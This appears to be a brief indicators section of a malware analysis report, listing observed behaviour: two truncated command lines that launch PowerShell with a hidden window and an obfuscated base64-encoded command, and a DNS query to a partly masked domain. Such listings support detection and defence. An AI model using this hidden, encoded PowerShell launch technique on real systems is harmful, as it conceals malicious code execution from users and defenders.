Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAmACAAKAAgACQAcABTAEgAbwBNAGUAWwAyADEAXQArACQAcABTAEgAbwBNAGUAWwAzADAAXQArACcAeAAnACkAIAAoACAAKAAoACIAewAxADMAfQB7ADMANwB9AHsANAAwAH0AewA4ADYAfQB7ADEAMAAzAH0AewA4ADEAfQ...
- DNS ASK g9###w8dqw.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e IAAmACAAKAAgACQAcABTAEgAbwBNAGUAWwAyADEAXQArACQAcABTAEgAbwBNAGUAWwAzADAAXQArACcAeAAnACkAIAAoACAAKAAoACIAewAxADMAfQB7ADMANwB9AHsANAAwAH0AewA4ADYAfQB7ADEAMAAzAH0AewA4ADEAfQ...' (with hidden window)